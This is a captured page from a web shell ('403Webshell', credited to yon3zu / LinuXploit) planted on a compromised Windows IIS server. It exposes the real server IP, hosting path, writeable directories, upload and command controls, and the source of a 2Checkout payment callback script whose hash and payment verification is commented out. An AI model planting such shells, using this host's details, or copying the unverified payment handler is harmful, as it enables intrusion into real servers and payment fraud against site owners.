403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/_pay/2co/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/_pay/2co/after.php
<?php
/* (C) Websplosion LLC, 2001-2021

IMPORTANT: This is a commercial software product
and any kind of using it must agree to the Websplosion's license agreement.
It can be found at http://www.chameleonsocial.com/license.doc

This notice may not be removed from the source code. */

$g['to_root'] = '../../';
include($g['to_root'] . '_include/core/main_start.php');

// Если будет неправильный код то вернёт ошибку на профиль в урбане и для старых на upgrade.php
/*$url = Common::urlSiteSubfolders();
$redirect = $url . 'upgrade.php';

// TEST URL
#http://site.com/_pay/2co/after.php?demo=Y&sid=339446&key=172DD4F1300AA621B5C41B2480BF04AC&total=19.95&credit_card_processed=Y&user_id=2&product=4

# http://ablespace.abk-soft.com/dev2/_pay/2co/after.php?demo=Y&sid=339446&key=172DD4F1300AA621B5C41B2480BF04AC&total=19.95&credit_card_processed=Y&user_id=2&product=4

// MAKE PAYMENT

// check payment
if(get_param('demo') == 'Y') {
    $order_number = 1;
} else {
    $order_number = get_param('order_number');
}
$hash = strtoupper(md5($pay['2co']['secret_word'].get_param('sid').$order_number.get_param('total')));
if($hash != get_param('key')) {
    redirect($redirect);
}
if(get_param('credit_card_processed') != 'Y') redirect($redirect);*/

$custom = get_param('product');
echo Pay::getAfterHtml($custom, '2co');

Youez - 2016 - github.com/yon3zu
LinuXploit